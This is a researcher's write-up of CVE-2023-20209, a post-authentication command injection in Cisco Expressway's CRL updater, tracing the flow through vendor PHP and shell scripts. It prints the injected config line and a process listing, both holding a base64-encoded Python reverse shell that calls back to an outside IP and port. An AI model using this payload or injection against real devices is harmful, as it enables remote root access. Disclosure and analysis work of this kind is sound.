Share
## https://sploitus.com/exploit?id=F2D6064B-BF0A-570E-BC5B-00079CC23FA0
I started looking at Cisco Expressway after I noticed quite a few of them on the internet during Red Team engagements, but never had the time during work to explore the product further. 

Initially I was looking for an auth bypass to chain into RCE but ran out of time and settled on a post auth RCE. The front end PHP code looks promising for further exploitation.....

These are my notes from discovery and vendor notification of CVE-2023-20209. 

Starting with a process list after exploitation we can see a call to /sbin/request-crlupdate:
```
root     16449  0.0  0.0   7472  4024 ?        S    Feb18   0:00 bash /sbin/request-crlupdate
root     16451  0.0  0.1   7544  4280 ?        S    Feb18   0:00 /bin/bash /etc/init.d/crlupdater restart
root     16466  0.0  0.2  14084 11236 ?        S    Feb18   0:00 python -c exec(__import__('base64').decodestring('cz1fX2ltcG9ydF9fKCdzb2NrZXQnKS5zb2NrZXQoX19pbXBvcnRfXygnc29ja2V0JykuQUZfSU5FVCxfX2ltcG9ydF9fKCdzb2NrZXQnKS5TT0NLX1NUUkVBTSk7IHMuY29ubmVjdCgoJzE5Mi4zMi41NS4xMzAnLCAxMzM3KSk7IF9faW1wb3J0X18oJ29zJykuZHVwMihzLmZpbGVubygpLDApOyBfX2ltcG9ydF9fKCdvcycpLmR1cDIocy5maWxlbm8oKSwxKTsgX19pbXBvcnRfXygnb3MnKS5kdXAyKHMuZmlsZW5vKCksMik7IHA9X19pbXBvcnRfXygnc3VicHJvY2VzcycpLmNhbGwoWycvYmluL3NoJywnLWknXSk='))
```

If we look at the contents of /sbin/request-crlupdate:

```
#! /bin/env bash

#
# This script is responsible to updating the CRL automatic updater process
#   when configuration is changed
#

# =============================================================================

# Needs to be kept in sync with PHP and updater script
readonly STARTFILE="/tmp/request/update_crl_config"
readonly LOCK_FILE="/tmp/crlupdater_running"

# =============================================================================

# Source for helper functions
readonly FUNCTIONS="/etc/functions"
[[ -f ${FUNCTIONS} ]] && . ${FUNCTIONS}

# =============================================================================

if [[ -f ${STARTFILE} ]]; then
    # Remove the flag file
    rm -f ${STARTFILE}

    if [[ -f ${LOCK_FILE} ]]; then
        do_log "Event=\"Updating CRL data\" Detail=\"CRL update already in progress. Scheduling another update\""
        touch ${STARTFILE}

        # To avoid the possibility of tight loop situation until the lock file is removed,
        #   let's sleep for a few seconds
        sleep 30
    else
        # Kick the CRL automatic update daemon
        /etc/init.d/crlupdater restart
    fi
fi

# =============================================================================
```

We can see it's calling the CRL automatic update daemon, this doesn't explain how we got there though. I tried to walkthrough the code flow below.


Starting with the PHP code for the web front end, in /share/web/public/crpupdater.php, there is a validation check to make sure it starts with http or https:

```
$crl_distribution_points_root_new = new SimpleXMLElement("<root/>");
                foreach ( $url_list as $line )
                {
                    if ( strlen( $line ) > 0 )
                    {
                        if ( preg_match( '/^(http|https):\/\/.+/i', $line ) > 0 )
                        {
                            // Ensure no spaces in the URI
                            $line = str_replace( " ", "%20", $line );

                            $crl_distribution_points_root_new->record[ $idx++ ]->distribution_point = $line;

                            $distribution_point_count++;
                        }
                        else
                        {
                            $unsupported_distribution_point_seen = true;
                        }
                    }
                }
```

This then gets passed off to what I believe is the python framework behind the web service, all the python is pyc so I lose some parts of the flow here but the below gives a hint.

Looks like the python causes a call to /sbin/request-crlupdate

/share/python/site-packages/ni/managementframework/applications/installed/crlupdatermanager/crlupdatermanager.pyc
```
        Class to manage requestd with regards CRL updates
    c         C   s    t  j j j j j |  | ฦ’ d  S(   N(   RO   RV   RW   RX   RY   R   (   R
   RL   (    (    sp   /share/python/site-packages/ni/managementframework/applications/installed/crlupdatermanager/crlupdatermanager.pyR   ?  s    c         C   s-   t  j d ฦ’ t j j j j j |  d ฦ’ d S(   s\   
            Creates the trigger file for requestd to restart the CRL update daemon
```

contents of /etc/init.d/crlupdater:

```
#!/bin/bash
#set -x

#
# Set up automatic CRL updates, if configured
#

readonly SERVICE="crl_updater"
readonly PID_FILE="/var/run/${SERVICE}.pid"


[[ -f /etc/functions ]] && . /etc/functions


start()
{
    # #86345
    #
    # Ensure that the policy services CRL file has the correct
    #   owner so that the web can update them
    chown _nobody:_nobody /tandberg/persistent/certs/policy-services.crl

    if upgrade_in_progress; then
        # Upgrading so let's not go any further
        echo "Upgrade in process. Not starting ${SERVICE}"
        exit 0
    fi

    if is_service_up ${SERVICE}; then
        # Service already running so let's not go any further
        echo "${SERVICE} already running. Not starting"
        exit 0
    fi

    echo "Starting ${SERVICE}"

    local readonly script="/bin/crl_updater"

    # Need to be kept in sync with PHP and script
    local readonly config_file="/tandberg/persistent/certs/crl-update.conf"

    # Ensure we have the correct directories
    local readonly certificates_base="/mnt/harddisk/certificates"
    local readonly crl_directory="${certificates_base}/crl"
    if [[ ! -d ${crl_directory} ]]; then
        mkdir -p ${crl_directory}
    fi

    if [[ -s ${config_file} ]]; then
        . "${config_file}"

        if [[ ${auto_updates} == "true" ]]; then
            # Check every 600 seconds to see if it is the configured hour
            #   and then run the script. If the script is run it will wait
            #   24 hours before running the script again
            /bin/time_kicker 600 ${update_hour} ${script} > /dev/null 2>&1 &
            echo $! > ${PID_FILE}
        else
            # We run the script anyway so that it can perform any clean-up
            #   required as a result of being disabled
            ${script} > /dev/null 2>&1 &
        fi
    fi
}

stop()
{
    if is_service_up ${SERVICE}; then
        echo "Stopping ${SERVICE}"
        kill_pid_file ${SERVICE} ${PID_FILE}

        rm -f ${PID_FILE}
    fi
}

restart()
{
    stop
    start
}

case "$1" in
    start)
        start
        ;;
    stop)
        stop
        ;;
    restart)
        restart
        ;;
    *)
        echo $"Usage: $0 {start|stop|restart}"
        exit 1
        ;;
esac

```

Some important lines here:

```
local readonly script="/bin/crl_updater"

local readonly config_file="/tandberg/persistent/certs/crl-update.conf"
```

Here are the contents of /tandberg/persistent/certs/crl-update.conf after exploitation:
```
auto_updates=true
update_hour=11
distribution_point=http://`python${IFS}-c${IFS}"exec(__import__('base64').decodestring('cz1fX2ltcG9ydF9fKCdzb2NrZXQnKS5zb2NrZXQoX19pbXBvcnRfXygnc29ja2V0JykuQUZfSU5FVCxfX2ltcG9ydF9fKCdzb2NrZXQnKS5TT0NLX1NUUkVBTSk7IHMuY29ubmVjdCgoJzE5Mi4zMi41NS4xMzAnLCAxMzM3KSk7IF9faW1wb3J0X18oJ29zJykuZHVwMihzLmZpbGVubygpLDApOyBfX2ltcG9ydF9fKCdvcycpLmR1cDIocy5maWxlbm8oKSwxKTsgX19pbXBvcnRfXygnb3MnKS5kdXAyKHMuZmlsZW5vKCksMik7IHA9X19pbXBvcnRfXygnc3VicHJvY2VzcycpLmNhbGwoWycvYmluL3NoJywnLWknXSk='))"`

```

we can see the malicious crl data above in the file.

in either case of the IF statement in /etc/init.d/crpupdater a call to execute /bin/crl_updater is made.

At this point the malicious code is executed in the flow of /bin/crl_updater:

```
read_configuration()
{
    # Source the configuration file
    #   Needs to be kept in sync with PHP and init script
    local readonly config_file="/tandberg/persistent/certs/crl-update.conf"

    local readonly config_separator="="
    local readonly distribution_point_prefix="distribution_point"

    if [[ -s ${config_file} ]]; then
        . "${config_file}"

        readonly CRL_UPDATE_MODE="${auto_updates}"
        readonly CRL_DISTRIBUTION_POINTS=`cat ${config_file} | while read line; do echo ${line} | grep "${distribution_point_prefix}" | tr "${config_separator}" "\n" | grep -v "${distribution_point_prefix}" ; done`

        if [[ ${CRL_UPDATE_MODE} == "true" ]]; then
            # Ensure that we have some distribution points configured
            if [[ -z "${CRL_DISTRIBUTION_POINTS}" ]]; then
                updater_event_logger "ERROR: No CRL distribution points configured"
                alarm raise $CONFIG_ALARM
                exit_handler 1
            fi
        fi
    else
        updater_event_logger "ERROR: CRL updater failed to find configuration file or file is empty"
        alarm raise $NO_CONFIG_ALARM
        exit_handler 1
    fi
}
```


then the config file containing our malicous command is executed via: 

```
    if [[ -s ${config_file} ]]; then
        . "${config_file}"
```

because our injection contains backticks it is then executed, I've provided a test case file to show the behaviour:

```
auto_updates=true
update_hour=11
distribution_point=http://`touch /tmp/test_file`
```

manually running the test case file in the same manner that the /bin/crl_updater script does:

```
~ # ls -al /tmp/ | grep test_file
~ # . /tmp/test_exec_point 
~ # ls -al /tmp/ | grep test_file
-rw-r--r--  1 root    root         0 Feb 20 01:16 test_file
```

I wrote a dirty and quick exploit script for the PoC, you can see it in action below

![](https://github.com/0x41-Researcher/CVE-2023-20209/blob/main/expressway_poc.gif)